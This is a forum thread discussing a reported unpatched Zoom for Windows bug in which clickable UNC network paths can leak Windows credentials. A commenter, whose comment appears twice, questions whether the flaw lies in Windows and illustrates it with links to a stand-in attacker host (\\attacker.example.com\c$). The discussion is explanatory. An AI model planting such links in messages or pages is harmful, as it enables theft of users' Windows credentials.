Zoom for Windows converts network locations into clickable links. What could go wrong?
Read the whole story
Read the whole story
Unpatched Zoom bug lets attackers steal Windows credentials with no warning
- Thread starter JournalBot
- Start date
Something doesn't make sense here. IF this works, the hole is in Windows.
If I click a link to \\attacker.example.com\c$ the expectation is Windows will see attacker.example.com != my local machine, and prompt me to supply a username and password to log into it (assuming guest credentials fail).
Now many, many users will get confused and supply their username and password at the login prompt.. But that is not the same as it being sent as soon as you click the link. If it IS doing that, that is a pretty big hole in windows. I can make links to file:![:\](https://cdn.arstechnica.net/civis/data/assets/smilies/slash-1x.png "Slash :\")
\attacker.example.com\c$ that will do the same on a web page.
If I click a link to \\attacker.example.com\c$ the expectation is Windows will see attacker.example.com != my local machine, and prompt me to supply a username and password to log into it (assuming guest credentials fail).
Now many, many users will get confused and supply their username and password at the login prompt.. But that is not the same as it being sent as soon as you click the link. If it IS doing that, that is a pretty big hole in windows. I can make links to file:
\attacker.example.com\c$ that will do the same on a web page.
Upvote
5
(5
/
0)
- Status